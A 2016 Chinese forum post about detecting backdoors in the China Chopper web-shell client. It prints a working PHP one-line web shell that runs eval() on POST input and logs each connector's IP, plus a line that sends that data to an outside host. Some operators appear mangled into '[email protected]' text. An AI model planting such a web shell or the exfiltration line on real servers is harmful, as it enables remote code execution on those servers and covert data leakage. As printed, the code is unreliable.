关于菜刀后门排查

小杰哥 (能学则学,技多不压身。) | 2016-03-08 14:56

最近菜刀后门被爆出来后  大家都在寻找没有后门的菜刀

可是...  

人家说没后门  你却不知道是否真的没有后门(除非自己抓下包或者反编译看看)

自己先初步排查  如抓包:

http://www.myhack58.com/Article/html/3/8/2015/66935.htm

习科 虾米大牛的

http://tieba.baidu.com/p/3187132003

去年的时候菜刀后门事件被爆 可没有现在那么火热

我也在挺早的时间查了一下自己的菜刀  确实有发现请求,不过现在去掉了

可是...  记得前段时间看到一篇文章 连上菜刀不发包  但是你做操作的时候才发包 这个也有遇到过..

于是... 还是被爆菊

我和大家分享一下我是如何发现菜刀是否存在后门的

我稍微修改了一句话木马  从而使他连接会记录连接者的IP

代码:

<?php

  header("Content-type:text/html;charset=utf-8");

if(!empty($_POST['t'])){

  $t = fopen("1.txt","a+");

  fwrite($t,"Hakcer IP: "[email protected]$_SERVER['REMOTE_ADDR']." Hacker Name: "[email protected]$_SERVER['REMOTE_HOST']." Hacker Prot: "[email protected]$_SERVER['REMOTE_PORT']."\r\n");

  eval($_POST['t']);

}

?>

1.txt 是在马的目录下的   各位可自行修改为远程发送

file_get_contents("http://www.t0n9.com/1.php?i="[email protected]$_SERVER['REMOTE_ADDR']."&n="[email protected]$_SERVER['REMOTE_HOST']."&p="@$_SERVER['REMOTE_PORT']);

这个有点守株待兔的感觉

到现在为止我博客的一句话都没有人连...

b.png

抛砖引玉,希望各位共享一下自己排查后门的方法与姿势!